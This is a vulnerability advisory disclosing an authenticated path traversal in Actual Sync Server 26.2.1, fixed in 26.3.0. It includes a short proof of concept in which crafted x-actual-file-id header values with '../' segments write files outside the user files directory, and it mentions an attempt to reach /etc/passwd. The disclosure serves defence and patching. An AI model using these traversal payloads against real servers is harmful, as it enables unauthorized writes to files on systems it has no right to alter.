Actual Sync Server 26.2.1 - Authenticated Path Traversal

5.3 (Medium)

Discovered by: Juan Patarroyo (External researcher)

Summary

Full name: Actual Sync Server 26.2.1 - Authenticated Path Traversal

Code name:

State: Public

Release date:

Affected product: Actual Sync Server

Vendor: Actual Budget

Affected version(s): 26.2.1

Fixed version(s): 26.3.0

Package manager: npm

Vulnerability name: Lack of data validation - Path Traversal

Remotely exploitable: Yes

CVSS v4.0 vector string: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

CVSS v4.0 base score: 5.3

Exploit available: Yes

CVE ID(s):

Description

Actual Sync Server allows authenticated users to upload files through POST /sync/upload-user-file. The server builds a filesystem path from the user-controlled x-actual-file-id header as join(resolve(config.get('userFiles')), `file-${fileId}.blob`). Because fileId is not validated against a strict allowlist and the resulting path is never checked against a canonical boundary, traversal segments (../) can escape the intended directory and write files outside userFiles.

Vulnerability

The affected endpoint is POST /sync/upload-user-file, where user-controlled x-actual-file-id is used to construct filesystem paths without strict allowlist validation or canonical boundary enforcement, enabling traversal-based writes outside the intended directory. A secondary weakness exists in GET /sync/download-user-file, which relies on startsWith(resolve(config.get('userFiles'))) for path validation and can be bypassed with sibling-prefix paths such as /data/user-files2. The root cause is implemented in actual/packages/sync-server/src/util/paths.js and actual/packages/sync-server/src/app-sync.ts.

PoC

Request:
POST /sync/upload-user-file
Headers:

  • x-actual-token: <valid token>

  • x-actual-name: poc

  • x-actual-file-id: ../../../server-files/pwned-traversal

  • Content-Type: application/encrypted-file

Body:

  • poc-content

Observed result:

  • /data/server-files/pwned-traversal.blob is created outside the intended user files directory.

Additional payload:

  • x-actual-file-id: ../../../../tmp/outside-actual-data

Observed result:

  • /tmp/outside-actual-data.blob is created.

Evidence of Exploitation

Successful write with crafted header x-actual-file-id: ../../../server-files/pwned-traversal.

  • File created at /data/server-files/pwned-traversal.blob.

  • Successful write outside /data at /tmp/outside-actual-data.blob.

  • Attempting direct read of /etc/passwd via this vector does not yield raw /etc/passwd; the resolved target becomes /etc/passwd.blob.

  • File creation evidence

Our security policy

We have reserved the ID CVE-2026-3089 to refer to this issue from now on.

Disclosure policy

System Information

  • Actual Sync Server

  • Version: 26.2.1

  • Operating System: Any

References

Mitigation

An updated version of Actual Sync Server is available at the vendor page.

Credits

The vulnerability was discovered by Juan Patarroyo from Fluid Attacks' Offensive Team.

Timeline

Vulnerability discovered

Vendor contacted

Vendor replied

Vendor confirmed

Vulnerability patched

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.

Get an AI summary of Fluid Attacks

Subscribe to our newsletter

Stay updated on our upcoming events and latest blog posts, advisories and other engaging resources.

© 2026 Fluid Attacks. We hack your software.


Meet us at RSA Conference™ 2026 at booth N-4614! Book a demo on-site.
